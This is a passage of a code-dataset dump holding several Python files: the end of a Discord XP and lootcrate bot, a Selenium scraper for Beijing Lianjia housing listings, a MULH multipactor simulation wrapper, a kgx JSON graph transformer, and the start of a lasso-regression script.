'.'))\r\n else:\r\n await bot.send_message(message.channel, str(str(SENDER) + ', you do not have a high enough role to use this command.'))\r\n elif CONTENT.split(' ')[0].lower() == 'k!crim_record':\r\n if DATA[str(message.author.id)]['roles'] >= 60:\r\n try:\r\n msg = str ('```')\r\n for _ in DATA[str(CONTENT.split(' ')[1])]['record']['record_sheet']:\r\n msg = str(msg) + str(_) + '\\n'\r\n msg = str(msg) + '```'\r\n if msg == '``````':\r\n msg = 'This person has no criminal record.'\r\n await bot.send_message(message.channel, str('Record sheet for userID ' + str(CONTENT.split(' ')[1]) + '\\n' + str(msg)))\r\n except KeyError:\r\n await bot.send_message(message.channel, 'User was not found, or has no existing record.')\r\n else:\r\n await bot.send_message(message.channel, str(str(SENDER) + ', you do not have a high enough role to use this command.'))\r\n elif CONTENT.split(' ')[0].lower() == 'k!info':\r\n if DATA[str(message.author.id)]['roles'] >= 70:\r\n try:\r\n await bot.send_message(message.channel, str(DATA[str(CONTENT.split(' ')[2])][str(CONTENT.split(' ')[1])]))\r\n except KeyError:\r\n await bot.send_message(message.channel, 'Inproper key passed for `k!info.type`.')\r\n else:\r\n await bot.send_message(message.channel, str(str(SENDER) + ', you do not have a high enough role to use this command.'))\r\n elif CONTENT.lower() == 'k!top all':\r\n msg = ''\r\n for _ in DATA:\r\n try:\r\n msg = str(msg) + str(str(others.fill(str(DATA[str(_)]['uname']), 40, ' ', ' '))) + str(DATA[str(_)]['xp'])\r\n if str(_) == str(message.author.id):\r\n msg = str(msg) + ' <--- You are here!'\r\n msg = str(msg) + '\\n'\r\n except:\r\n pass\r\n last = 0\r\n for item in range(0, len(msg), 1500):\r\n if item != 0:\r\n await bot.send_message(message.channel, str('```' + str(msg[last:item]) + '```'))\r\n last = item\r\n await bot.send_message(message.channel, str('```' + str(msg[last:len(msg)]) + '```'))\r\n elif CONTENT.split(' ')[0].lower() == 'k!set_playing':\r\n if DATA[str(message.author.id)]['roles'] > 80:\r\n await bot.change_presence(game = discord.Game(name = str(CONTENT[14:])))\r\n else:\r\n await bot.send_message(message.channel, str(str(SENDER) + ', you do not have a high enough role to use this command.'))\r\n elif CONTENT.split(' ')[0].lower() == 'k!give_rank':\r\n if DATA[str(message.author.id)]['roles'] >= 70:\r\n DATA[str(CONTENT.split(' ')[2])]['roles'] = int(CONTENT.split(' ')[1])\r\n else:\r\n await bot.send_message(message.channel, str(str(SENDER) + ', you do not have a high enough role to use this command.'))\r\n elif CONTENT.split(' ')[0].lower() == 'k!ban_toggle':\r\n if DATA[str(message.author.id)]['roles'] >= 80:\r\n status = ''\r\n person = str(CONTENT.split(' ')[1])\r\n try:\r\n if DATA[person]['record']['blocked'] == False:\r\n DATA[person]['record']['blocked'] = True\r\n status = 'blocked'\r\n else:\r\n DATA[person]['record']['blocked'] = False\r\n status = 'unblocked'\r\n except KeyError:\r\n await bot.send_message(message.channel, 'The person has no record sheet.')\r\n await bot.delete_message(message)\r\n await bot.send_message(message.channel, str('UserID: ' + str(person) + ' has been ' + str(status) + '.'))\r\n else:\r\n await bot.send_message(message.channel, str(str(SENDER) + ', you do not have a high enough role to use this command.'))\r\n elif CONTENT.split(' ')[0].lower() == 'k!reddit':\r\n postlink = 'Error getting link'\r\n cs = 1\r\n subred = str(CONTENT.split(' ')[1])\r\n rp = reddit_bot.subreddit(subred).new(limit = 200)\r\n done = False\r\n try:\r\n for _ in rp:\r\n if cs == CRP and done == False:\r\n postlink = str(_.url)\r\n CRP += 1\r\n if CRP == '199':\r\n CRP = 1\r\n done = True\r\n cs += 1\r\n except:\r\n pass\r\n await bot.send_message(message.channel, postlink)\r\n elif CONTENT.split(' ')[0].lower() == 'k!giveusingadmin':\r\n if CONTENT.split(' ')[1].lower() == 'xp':\r\n try:\r\n try:\r\n DATA[str(str(CONTENT).split(' ')[2])]['xp'] += int(str(CONTENT).split(' ')[3])\r\n await bot.send_message(message.channel, 'XP given.')\r\n except KeyError:\r\n await bot.send_message(message.channel, 'Result was `KeyError` which means that this may not be a user profile. This may also mean that the user is not in my database. Try doing a `k!item_info ` to check if they are registered.')\r\n except:\r\n await bot.send_message(message.channel, 'Result was `General failure`. You may have passed incorrect arguments for the command.')\r\n elif CONTENT.split(' ')[1].lower() == 'crate':\r\n try:\r\n try:\r\n DATA[(str(CONTENT).split(' ')[2])]['crates'] += int(str(CONTENT).split(' ')[3])\r\n await bot.send_message(message.channel, 'Crate given.')\r\n except KeyError:\r\n await bot.send_message(message.channel, 'Result was `KeyError` which means that this may not be a user profile. This may also mean that the user is not in my database. Try doing a `k!item_info ` to check if they are registered.')\r\n except:\r\n await bot.send_message(message.channel, 'Result was `General failure`. You may have passed incorrect arguments for the command.')\r\n else:\r\n await bot.send_message(message.channel, 'Incorrect argument[s] passed for the command `k!give`.')\r\n elif CONTENT.lower() == 'k!top self':\r\n await bot.send_message(message.channel, (str(DATA[str(message.author.id)]['uname']) + ', you have ' + str(DATA[str(message.author.id)]['xp']) + ' XP points!'))\r\n elif CONTENT.lower() == 'k!top':\r\n await bot.send_message(message.channel, 'Too few arguments have been passed for the command `k!top `.')\r\n elif CONTENT.split(' ')[0].lower() == 'k!restart_server_stats': ################################################################################################################## <---\r\n if DATA[str(message.author.id)]['roles'] >= 70:\r\n None\r\n else:\r\n await bot.send_message(message.channel, str(str(SENDER) + ', you do not have a high enough role to use this command.'))\r\n elif CONTENT.split(' ')[0].lower() == 'k!item_info':\r\n if DATA[str(message.author.id)]['roles'] >= 70:\r\n try:\r\n await bot.send_message(message.channel, str('`' + str(DATA[str(CONTENT.split(' ')[1])]) + '`'))\r\n except KeyError:\r\n await bot.send_message(message.channel, 'Uh oh! It seems that that person is not in my registry. [evil laughs] ***but they will be soon...***')\r\n else:\r\n await bot.send_message(message.channel, str(str(SENDER) + ', you do not have a high enough role to use this command.'))\r\n elif CONTENT.split(' ')[0].lower() in ['k!say', 'k!echo']:\r\n CNEW = ''\r\n for _ in CONTENT.split(' ')[1:]:\r\n CNEW = str(CNEW) + str(_) + ' '\r\n await bot.send_message(message.channel, CNEW)\r\n await bot.delete_message(message)\r\n elif CONTENT.split(' ')[0].lower() == 'k!version':\r\n await bot.send_message(message.channel, 'The current Katznbot version is <0.2.0 - Beta Release>')\r\n elif CONTENT.split(' ')[0].lower() == 'k!lingering':\r\n if DATA[str(message.author.id)]['roles'] >= 70:\r\n await bot.send_message(message.channel, str('`' + str(LINGERING) + '`'))\r\n else:\r\n await bot.send_message(message.channel, str(str(SENDER) + ', you do not have a high enough role to use this command.'))\r\n elif CONTENT.split(' ')[0].lower() == 'k!pickuplc':\r\n if LINGERING['crates'] > 0:\r\n DATA[str(message.author.id)]['crates'] += 1\r\n await bot.send_message(message.channel, str('```' + str(SENDER) + ' picked up the lootcrate first! Type \"k!open\" to open it up and see what is inside!```'))\r\n LINGERING['crates'] -= 1\r\n elif CONTENT.split(' ')[0].lower() == 'k!pickupxp':\r\n if LINGERING['xp'] > 0:\r\n reward = random.randint(200, 5000)\r\n DATA[str(message.author.id)]['xp'] += reward\r\n await bot.send_message(message.channel, str('```' + str(SENDER) + ' picked up the XP first! ' + str(reward) + ' XP has been added to your inventory!```'))\r\n LINGERING['xp'] -= 1\r\n elif CONTENT.split(' ')[0].lower() == 'k!inventory':\r\n await bot.send_message(message.channel, str('```' + str(SENDER) + ', you have ' + str((DATA[str(message.author.id)]['crates'])) + ' lootcrates in your inventory. Type \"k!open\" to open them.```'))\r\n elif CONTENT.split(' ')[0].lower() == 'k!push':\r\n if DATA[str(message.author.id)]['roles'] >= 70:\r\n if CONTENT.split(' ')[1].lower() == 'crate':\r\n LINGERING['crates'] += 1\r\n await bot.send_message(message.channel, '```A lootcrate has appeared! Type \"k!pickuplc\" to claim it!```')\r\n elif CONTENT.split(' ')[1].lower() == 'xp':\r\n LINGERING['xp'] += 1\r\n await bot.send_message(message.channel, '```Some XP has appeared! Type \"k!pickupxp\" to claim it!```')\r\n else:\r\n await bot.send_message(message.channel, 'Invalid parameters for command: k!push.')\r\n else:\r\n await bot.send_message(message.channel, str(str(SENDER) + ', you do not have a high enough role to use this command.'))\r\n elif CONTENT.split(' ')[0].lower() == 'k!open':\r\n if DATA[str(message.author.id)]['crates'] > 0:\r\n amount1 = random.randint(1000, 20000)\r\n amount2 = random.randint(1000, 20000)\r\n amount3 = random.randint(1000, 20000)\r\n amount4 = random.randint(1000, 20000)\r\n DATA[str(message.author.id)]['xp'] += amount1\r\n DATA[str(message.author.id)]['xp'] += amount2\r\n DATA[str(message.author.id)]['xp'] += amount3\r\n DATA[str(message.author.id)]['xp'] += amount4\r\n await bot.send_message(message.channel, str('```You opened the lootbox and got:\\n\\n' + str(amount1) + ' XP\\n' + str(amount2) + ' XP\\n' + str(amount3) + ' XP\\n' + str(amount4) + ' XP\\n\\nFor a total of ' + str(amount1 + amount2 + amount3 + amount4) + ' XP!```'))\r\n DATA[str(message.author.id)]['crates'] -= 1\r\n else:\r\n await bot.send_message(message.channel, 'You have no lootboxes to open!')\r\n #-----------------------------------------------------------------------------COMMAND-LOOP\r\n if random.randint(0, 100) == 2:\r\n item = random.choice(['crates', 'xp'])\r\n LINGERING[item] += 1\r\n if item == 'crates':\r\n await bot.send_message(message.channel, '```A lootcrate has appeared! Type \"k!pickuplc\" to claim it!```')\r\n else:\r\n await bot.send_message(message.channel, '```Some XP has appeared! Type \"k!pickupxp\" to claim it!```')\r\n except exception:\r\n print ('EXCEPTION ON on_message.main')\r\n await bot.send_message(message.channel, 'Whoops, seems that my code just made an error! The developer has been notified and will work on it. Info: `E1`.') #E1\r\n try:\r\n file = open('Katznbot_db_log.txt', 'w')\r\n file.write('DATA = ' + str(DATA))\r\n file.close()\r\n except exception:\r\n print ('EXCEPTION ON on_message.save')\r\n\r\n@bot.event\r\nasync def on_ready():\r\n print (bot.user.name, bot.user.id)\r\n\r\nbot.run(token)\r\n","sub_path":"KatznbotBetaPublicRelease.py","file_name":"KatznbotBetaPublicRelease.py","file_ext":"py","file_size_in_byte":23181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"274179619","text":"# _*_ coding:utf-8 -*-\n# 开发人员:&杜乾坤\n# 开发工具:&pycharm\n#爬取链家二手房信息。\n# 要求:\n# 1.爬取的字段:\n# 名称,房间规模、价格,建设时间,朝向,详情页链接\n# 2.写三个文件:\n# 1.简单py 2.面向对象 3.改成多线程\n\nfrom selenium import webdriver\n#from selenium.webdriver.chrome.options import Options\nfrom lxml import etree\n\n\ndef get_element(url):\n driver.get(url)\n html = etree.HTML(driver.page_source)\n return html\n\n\nlis = [] # 存放所有区域包括房子\ndriver = webdriver.Chrome()\nhtml = get_element('https://bj.lianjia.com/ershoufang/')\ncity_list = html.xpath('//div[@data-role=\"ershoufang\"]/div/a/@href')\ncity_name_list = html.xpath('//div[@data-role=\"ershoufang\"]/div/a/text()')\nfor num, city in enumerate(city_list):\n item = {} # 存放一个区域\n sum_house = [] # 存放每个区域的房子\n item['区域'] = city_name_list[num] # 城区名字\n for page in range(1, 3):\n city_url = 'https://bj.lianjia.com' + city + 'pg' + str(page)\n html = get_element(city_url)\n '''名称, 房间规模,建设时间, 朝向, 详情页链接'''\n title_list = html.xpath('//div[@class=\"info clear\"]/div/a/text()') # 所有标题\n detail_url_list = html.xpath('//div[@class=\"info clear\"]/div/a/@href') # 所有详情页\n detail_list = html.xpath('//div[@class=\"houseInfo\"]/text()') # 该页所有的房子信息列表,\n city_price_list = html.xpath('//div[@class=\"totalPrice\"]/span/text()')\n for i, content in enumerate(title_list):\n house = {}\n detail = detail_list[i].split('|')\n house['名称'] = content # 名称\n house['价格']=city_price_list[0]+'万'#价格\n house['规模'] = detail[0] + detail[1] # 规模\n house['建设时间'] = detail[-2] # 建设时间\n house['朝向'] = detail[2] # 朝向\n house['详情链接'] = detail_url_list[i] # 详情链接\n sum_house.append(house)\n item['二手房'] = sum_house\n print(item)\n lis.append(item)\n\n","sub_path":"爬虫编程/案例20_爬取链家网北京每个区域的所有房子.py","file_name":"案例20_爬取链家网北京每个区域的所有房子.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"596851931","text":"##/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 15 11:03:24 2017\n\n@author: AP252436\n\"\"\"\n\nimport numpy as np\nimport os as os\n#import shutil\nimport subprocess as sub\nimport fileinput\n\n#==============================================================================\n# Messages colors\n#==============================================================================\ndef printc(message, color='red'):\n if color in ('red','r','warning'):\n escape_code = '\\x1b[41m'\n if color in ('blue', 'b','message'):\n escape_code = '\\x1b[34m'\n if color in ('green', 'g','results'):\n escape_code = '\\x1b[32m'\n if color in ('magenta', 'm','error'):\n escape_code = '\\x1b[35m'\n if color in ('cyan', 'c','info'):\n escape_code = '\\x1b[36m'\n normal_code = '\\x1b[0m'\n print(escape_code+message+normal_code)\n\n\n#==============================================================================\n# Class MULHcl\n#==============================================================================\nclass MULHcl(object):\n \"\"\"\n MULH simulation object.\n \n IMPORTANT :\n A config.mulh file should be present in the MULH/ directory.\n \n Results will be stored in the MULH/data/results_python folder.\n \"\"\"\n MULH_PATH = '/Home/AP252436/MULH/'\n BIN_PATH = MULH_PATH + 'bin/'\n counter = 0 #Counter in order to compile MULH only once\n error_counter = 0 # Counts every time a computation has to be made once again\n\n if not os.path.exists(MULH_PATH):\n raise OSError('Incorrect MULH folder absolute path') \n if not os.path.exists(BIN_PATH):\n raise OSError('Incorrect bin relative path -- check that there is a bin directory in the MULH folder')\n \n\n\n def __init__(self, project_path, \n config_path, \n output_path):\n \"\"\"\n Constructor\n \n Arguments:\n - project_path: absolute project path\n (- config_file: file called by MULHs.f90)\n (- results_file: name of the file where results are stored)\n \"\"\"\n \n self.project_path = project_path \n# if not os.path.exists(project_path):\n# raise OSError('Incorrect project directory absolute path')\n \n self.config_path = config_path\n# if not os.path.isfile(config_path):\n# print(config_path)\n# raise OSError('Incorrect relative config filename')\n \n self.output_path = output_path\n# if not os.path.isfile(output_path):\n# print(output_path)\n# raise OSError('Incorrect relative output filename')\n\n\n \n \n \n def create_config_file(self, config_path):\n \"\"\"\n Set config.mulh\n \n Argument:\n - project_path: where config.mulh should be stored\n \n Returns:\n - config.mulh: a config file in project_path\n \n Resources:\n - MULH_PATH/names.mulh: a text file containing all variable names\n - MULH_PATH/types.mulh: a text file containing all formats\n \n \"\"\"\n config = np.zeros(46, dtype = 'object')\n\n #****************************************************************************************************************************\n # \t\t\tUSER INPUTS\n #\n #\n # Analysis type (atype)\n # 0 = single run at a user specified power, not a power sweep. Can create a video by changing psave\n # 1 = single power sweep\n # 2 = varying length analysis. Requires same inputs as 1 but also to specify lower and upper lw (in multiples of 10)\n # 3 = convergence study. Specify lower and upper NOC_lambda.\n # 4 = sensitivity to toroidal magnetic field (Bx)\n # 5 = sensitivity to poloidal magnetic field (By)\n # 6 = sensitivity to radial magnetic field (Bz)\n # 7 = threshold for different machines using different materials at different frequencies\n # 8 = single sweep w/ controlled stochasticity. Provide px2, pv2, pphases and a stock of random deviates (need enough of them)\n # 9 = single sweep w/ controlled stochasticity. Provide px2, pv2, pphases, srand, drand, irand, secrand\n # 10 = time convergence study. Specify lower and upper CLfactor will be 0.99.\n # 11 = sensitivity to a_lara unknown factor that has to be between 7e-3 and 10e-3\n # 12 = stochastic oscillation of results\n # \n # NOTE = 2-7, 10, 11 and 12 can take a very long time so it is recommended to run them remotely (in a server)\n \n config[0] = 1 # atype\n #==============================================================================\n # ######### Geometry #########\n #==============================================================================\n config[1] = 70 # b: Height of the waveguide in mm\n config[2] = 2 # a: Width of the waveguide in mm\n config[3] = 70 # lw: Depth/Length of the waveguide in mm. If changed make sure there are still enough cells per wavelength\n config[4] = 160 # lwu: Upper waveguide length (if atype==2)\n \n config[5] = 20 # NOC_lambda: Number of Cells per wavelength\n config[6] = 50 # NOC_lambdau: Upper number of Cells per wavelength (for atype==3)\n config[7] = 0.95 # CLfactor: Factor to make sure Courant-Levy condition is obeyed. Decrease CLfactor for smaller time step\n config[8] = 0.1 # Prec: Threshold precision (dB)\n \n #==============================================================================\n # ######### Input Wave/Field solver #########\n #==============================================================================\n config[9] = 3.7e9 # f_I: Frequency of input wave in Hz\n config[10] = 1.0e4 # Pl0: Lower power limit (watts)\n config[11] = 1.0e6 # Pu0: Upper power limit (watts)\n \n config[12] = 1 # fields: Field solver. =1 FDTD, =2 analytic TE10 mode, =3 exported from other solver(need NOC_PML=1 w/ fields=3)\n config[13] = 1 # ramp: Increase fields slowly over ramp periods, integer\n config[14] = 1 # NOC_PML: Number Of Cells in PML, integer\n config[15] = 1e-10 # R_max: Reflection error for normally incident wave (as a fraction)\n config[16] = 3 # m_PML: PML grading order, integer\n \n #==============================================================================\n # ########## Static DC magnetic field (poloidal + toroidal). Gauss format, e.g. 2/10000. Minimum field allowed = 1G#########\n #==============================================================================\n config[17] = 0. # sBx: Toroidal magnetic field at plasma center (T)\n config[18] = 0. # sBxu: Upper toroidal magnetic field at plasma center (T) (for atype==4)\n config[19] = 0. # sBy: Poloidal magnetic field in waveguide (T)\n config[20] = 0. # sByu: Upper poloidal magnetic field in waveguide (T)\n config[21] = 0. # sBz: Radial magnetic field in waveguide (T)\n config[22] = 0. # sBzu: Upper radial magnetic field in waveguide (T)\n \n #==============================================================================\n # ########## Particles #########\n #==============================================================================\n config[23] = 100 # Np: Number of primary particles (has to be even, preferably multiples of 16)\n config[24] = 5 # vth: Initial energy of seed electrons (eV), integer\n config[25] = np.sqrt(2.) # vra: Ratio of vth_perpendicular to vth_parallel (sqrt(2) for isotropic)\n config[26] = 3 # px_i: Position of seed e 1=Side walls 2=4 planes parallel to side walls 3= Randomly scattered in centered region\n config[27] = 4 # fmax: vth*fMax is the largest velocity represented for the sample array fSample\n config[28] = 250 # nsamplev: # of sample fraction values for creating a Maxwellian velocity distribution function\n config[29] = 3 # launch: Launch method 1=each at a different phase [0,360] 2=range of phases every 5 or 10 degrees [0,360] 3=random\n \n #==============================================================================\n # ########## Particle-Wall interaction #########\n #==============================================================================\n config[30] = 1 # seec: SEE model, =1 Modified Vaughan, =2 Furman & Pivi, =3 Cheng w/ de Lara Re/Rr, =4 FEST3Dish?\n config[31] = 1 # ReRr: Contributions from elastically (Re) and rediffused (Rr) electrons. =1 de Lara, =2 CERN LHC report\n config[32] = 35 # E1: First crossover\n config[33] = 165 # Emax: Emax(delta=max,theta=0) in eV\n config[34] = 0.5 # delta_b: Yield below E_0\n config[35] = 2.3 # deltamax: Maximum secondary electron yield (at Emax) for normal incidence (theta=0)\n config[36] = 1 # p_n: p_n phenomelogical parameter in Furman & Pivi, ==2 in Cheng\n config[37] = 1 # kse: Energy Roughness factor, [0,2], 0=rough,2=smooth\n config[38] = 1 # ks: Angle Roughness factor, [0,2], 0=rough,2=smooth\n config[39] = 1 # Eom: Av energy of Maxwellian distribution of secondary electrons emitted (eV)\n config[40] = 4 # Ns: Number of secondary electrons simulated (in multiples of Np)\n config[41] = 7.5e-3 # a_lara: Material dependent coeff for elastic contribution in de Lara's paper\n config[42] = 29 # z_lara: Atomic number of coating material in Lara's fit\n config[43] = 'copper' # mat: Material\n \n #==============================================================================\n # ########## Save outputs ##########\n #==============================================================================\n config[44] = 0\t # psave: Save particle position and velocity every psave iteration, =0 for not saving\"\n #==============================================================================\n # -------------------------END OF USER INPUTS----------------------------------\n #==============================================================================\n \n \n #==============================================================================\n # Store datas in config.mulh\n #==============================================================================\n # Read-only files were datatype and name of variables are written\n types = np.loadtxt(self.MULH_PATH + 'types.mulh', dtype=bytes).astype(str) # Trick to avoid the\n names = np.loadtxt(self.MULH_PATH + 'names.mulh', dtype=bytes).astype(str) # 'b' in front of strings\n\n # Write \n outfile = open(config_path, 'w')\n for i in range(45):\n # Columns <100 : User inputs with 'types.mulh' format ; Columns >100 : Variables names\n outfile.write(str(types[i]%config[i]) + names[i] + '\\n')\n outfile.close()\n \n printc( '\\n' + '_____________________________________' \n + '\\n' + ' config.mulh created! '\n + '\\n' + '_____________________________________'\n + '\\n',color='message')\n\n\n\n\n def set_config_parameter(self, config_path, param, value):\n \"\"\"\n Changes the inital value of param by value\n \n Arguments:\n - param: the name of the parameter that you want to be changed. It must be in the list 'MULH_PATH/names.mulh'\n - value: the new desired value of param\n \n Returns:\n None\n \"\"\"\n config_path = self.config_path\n types = np.loadtxt(self.MULH_PATH + 'types.mulh', dtype=bytes).astype(str) # Trick to avoid the\n names = np.loadtxt(self.MULH_PATH + 'names.mulh', dtype=bytes).astype(str) # 'b' in front of strings\n with fileinput.FileInput(config_path, inplace=True, backup='.bak') as file:\n for line in file:\n if(param in line and param == str(line.split()[1])):\n print(str(types[file.filelineno()-1]%value + names[file.filelineno()-1])) # Replace the param with the desired value and the good format\n else:\n print(line, end='')\n \n \n def get_config_parameter(self, param):\n \"\"\"\n Check if 'param' exists or has not been deleted by error\n \n Arguments:\n - param: the parameter. It must be in the list 'MULH_PATH/names.mulh'\n \n Returns:\n - value of param\n \"\"\"\n config_path = self.config_path\n \n value = []\n with fileinput.FileInput(config_path) as file:\n for line in file:\n if(param in line and param == str(line.split()[1])):\n value = (line.split()[0])\n print('Parameter: ' + param + ' = ' + value)\n return value\n \n \n def fortran_compile(self):\n \"\"\"\n Compile the code with the 'make' command.\n \n Arguments:\n None\n \n Returns:\n Compilation status message\n \"\"\"\n printc('Compiling...', color='message')\n cmd_compile = 'cd && cd ' + self.MULH_PATH + ' && make'\n try:\n sub.call(cmd_compile, shell=True)\n printc( '\\n' + '_____________________________________' \n + '\\n' + ' Compilation complete! '\n + '\\n' + '_____________________________________'\n + '\\n',color='message')\n\n except sub.CalledProcessError as e:\n printc( '\\n' + '_____________________________________' \n + '\\n' + ' Compilation failed! '\n + '\\n' + ' Error ' + e\n + '\\n' + '_____________________________________'\n + '\\n',color='error')\n printc('Complete !', color='message')\n \n \n def run(self):\n \"\"\"\n Run the MULH modeling.\n \n Arguments:\n None\n \n Returns:\n None\n \"\"\"\n\n try:\n env = os.environ\n with sub.Popen(self._get_run_command(), shell=True, env=env, \n stdout=sub.PIPE, stderr=sub.PIPE, universal_newlines=True) as p:\n for lines in p.stdout:\n print(lines, end=' ') # Print MULH messages\n except OSError as e:\n printc('Error ! ' + e, color='error')\n\n \n def _get_run_command(self):\n \"\"\"\n Define bash command that will run the MULH code\n \n Arguments:\n None\n \n Returns:\n command line\n \"\"\"\n cmd = 'cd && cd ' + self.BIN_PATH + ' && ./MULH ' + self.config_path + ' ' + self.output_path\n return(cmd)\n \n \n \n def get_results(self):\n \"\"\"\n Returns MULH run results\n \n Arguments:\n None\n \n Returns:\n power: array of breakdown power\n sBx, sBy, sBz: toroidal, poloidal and radial static magnetic fields\n \"\"\"\n power, sBx, sBy, sBz = None, None, None, None\n if os.path.isfile(self.output_path):\n power, sBx, sBy, sBz = np.loadtxt(self.output_path, \n skiprows=0, \n unpack=True)\n self.power = power\n self.sBx = sBx\n self.sBy = sBy\n self.sBz = sBz\n return power, sBx, sBy, sBz\n\n \n \nif __name__ == \"__main__\": \n # Absolute path of the project\n project_path = '/Home/AP252436/Work_MULH/'\n \n # Output path\n results_file = 'results/results.txt'\n output_path = os.path.join(project_path, results_file)\n \n # Path to the .mulh file \n config_file = 'config.mulh'\n config_path = os.path.join(project_path, config_file)\n printc('RESULTS PATH : ' + output_path)\n # Run the MULH Simulation \n mulh = MULHcl(project_path, config_path, output_path)\n\n # Create the config file\n mulh.create_config_file(config_path)\n \n \n # Give the parameter name\n parameter_name = 'sBx'\n\n # Compile only if it is the first execution of the program\n if(mulh.counter == 0):\n mulh.fortran_compile()\n mulh.counter = mulh.counter + 1\n printc(\"Compteur d'exécutions : \" + str(mulh.counter),color='message') # Debug\n try:\n mulh.run()\n power, sBx, sBy, sBz = mulh.get_results()\n except ValueError:\n mulh.error_counter = mulh.error_counter + 1 \n printc(\"ERREUR !! Compteur d'erreurs : \" + str(mulh.error_counter),color='warning')\n mulh.run()\n power, sBx, sBy, sBz = mulh.get_results()\n\n \n printc('Breakdown power : ' + str(power) + 'W'\n + '\\n' + 'Toroidal magnetic field : ' + str(sBx) + 'T'\n + '\\n' + 'Poloidal magnetic field : ' + str(sBy) + 'T'\n + '\\n' + 'Radial magnetic field : ' + str(sBz) + 'T', color='results')\n \n # Appending the results to a text file\n with open(os.path.join(project_path, 'RESULTS.txt'),'ba') as f_handle:\n np.savetxt(f_handle, [power, sBx])\n \n \n \n \n \n \n \n \n","sub_path":"MULHBatch/MULH.py","file_name":"MULH.py","file_ext":"py","file_size_in_byte":17674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"486514944","text":"import json\nimport logging\nfrom .transformer import Transformer\nfrom .pandas_transformer import PandasTransformer # Temp\n\nclass JsonTransformer(PandasTransformer):\n \"\"\"\n \"\"\"\n\n def parse(self, filename, input_format='json', **args):\n \"\"\"\n Parse a JSON file\n \"\"\"\n with open(filename, 'r') as f:\n obj = json.load(f)\n self.load(obj)\n\n def load(self, obj):\n if 'nodes' in obj:\n self.load_nodes(obj['nodes'])\n if 'edges' in obj:\n self.load_edges(obj['edges'])\n\n def load_nodes(self, objs):\n for obj in objs:\n self.load_node(obj)\n def load_edges(self, objs):\n for obj in objs:\n self.load_edge(obj)\n\n def export(self):\n nodes=[]\n edges=[]\n for id,data in self.graph.nodes(data=True):\n node = data.copy()\n node['id'] = id\n nodes.append(node)\n for s, o, data in self.graph.edges(data=True):\n edge = data.copy()\n edge['subject'] = s\n edge['object'] = o\n edges.append(edge)\n\n return {\n 'nodes':nodes,\n 'edges':edges,\n }\n\n def save(self, filename, **args):\n \"\"\"\n Write a JSON file\n \"\"\"\n obj = self.export()\n with open(filename,'w') as file:\n file.write(json.dumps(obj, indent=4, sort_keys=True))\n","sub_path":"kgx/json_transformer.py","file_name":"json_transformer.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"401773041","text":"import import_files\n\nimport numpy as np\nimport pandas as pd\nimport math\nimport matplotlib.pyplot as plt\n\nfrom regressionalgorithms import * \nimport dataloader\nfrom dataloader import load_ctscan\nfrom time import sleep\n\ndef l2err(prediction,ytest):\n \"\"\" l2 error (i.e., root-mean-squared-error) \"\"\"\n return np.linalg.norm(np.subtract(prediction,ytest))\n\n\ndef l2(vec):\n \"\"\" l2 norm on a vector \"\"\"\n return np.linalg.norm(vec)\n\n\ndef loadcsv(filename):\n dataset = np.genfromtxt(filename, delimiter=',')\n return dataset\n\ndef load_ctscan(trainsize=5000, testsize=5000):\n \"\"\" A CT scan dataset \"\"\"\n if trainsize + testsize < 5000:\n filename = '../code/datasets/slice_localization_data.csv'\n else:\n filename = '../code/datasets/slice_localization_data.csv'\n dataset = loadcsv(filename)\n trainset, testset = splitdataset(dataset,trainsize, testsize,featureoffset=1) \n return trainset,testset\n\ndef rmse(vec):\n return np.sqrt(sum(vec)/vec.shape[0])\n\n# Changed the normalizing.\ndef splitdataset(dataset, trainsize, testsize, testdataset=None, featureoffset=None, outputfirst=None):\n \"\"\"\n Splits the dataset into a train and test split\n If there is a separate testfile, it can be specified in testfile\n If a subset of features is desired, this can be specifed with featureinds; defaults to all\n Assumes output variable is the last variable\n \"\"\"\n randindices = np.random.randint(0,dataset.shape[0],trainsize+testsize)\n featureend = dataset.shape[1]-1\n outputlocation = featureend \n if featureoffset is None:\n featureoffset = 0\n if outputfirst is not None:\n featureoffset = featureoffset + 1\n featureend = featureend + 1\n outputlocation = 0\n \n Xtrain = dataset[randindices[0:trainsize],featureoffset:featureend]\n ytrain = dataset[randindices[0:trainsize],outputlocation]\n Xtest = dataset[randindices[trainsize:trainsize+testsize],featureoffset:featureend]\n ytest = dataset[randindices[trainsize:trainsize+testsize],outputlocation]\n\n if testdataset is not None:\n Xtest = dataset[:,featureoffset:featureend]\n ytest = dataset[:,outputlocation] \n\n # Normalize features, with maximum value in training set\n # as realistically, this would be the only possibility \n for ii in range(Xtrain.shape[1]):\n Xtrain[:,ii] = np.divide(Xtrain[:,ii], np.sqrt(np.sum(Xtrain[:,ii]**2)))\n Xtest[:,ii] = np.divide(Xtest[:,ii], np.sqrt(np.sum(Xtrain[:,ii]**2)))\n \n # Add a column of ones; done after to avoid modifying entire dataset\n Xtrain = np.hstack((Xtrain, np.ones((Xtrain.shape[0],1))))\n Xtest = np.hstack((Xtest, np.ones((Xtest.shape[0],1))))\n \n return ((Xtrain,ytrain), (Xtest,ytest))\n\n\n#Load the data\ntrain,test = load_ctscan(20000,10000)\nX_train,y_train = train\nX_test, y_test = test\n\n'''\nThis class applies lasso regularization to linear regression.\n\nInput: lambda_param : The regularization meta parameter.\n step_size : The tolerance for changes in the residuals.\n max_iter : The maximum number of iteration to run the coordinate descent\n if it doesn't converge.\nOutput: (void) Set weights for linear regression.\n'''\nclass Lasso():\n def __init__(self, lambda_param= 0.05,step_size=0.00001, max_iter = 20):\n self.lambda_param = lambda_param\n self.reg = FSLinearRegression({'features':list(range(385))})\n self.reg.weights = None\n self.step_size = step_size\n self.max_iter = max_iter\n\n ## Coordinate descent to solve the lasso problem, takes in the features\n ## of the training set and the target variable.\n def coordinate_descent(self,Xv_train,yv_train):\n # self.reg.weights : sets the weight of the linear regression. see the __init__ for\n # constructor of FSLinearRegression.\n self.reg.weights = np.random.random(Xv_train.shape[1])\n \n converged = False\n residual = yv_train\n ## The loop runs till the convergence condition is met or the number\n ## of iterations are reached.\n while (~(converged)&(self.max_iter > 0)) :\n step_sizes = []\n for idx in sorted(list(range(Xv_train.shape[1]))): # 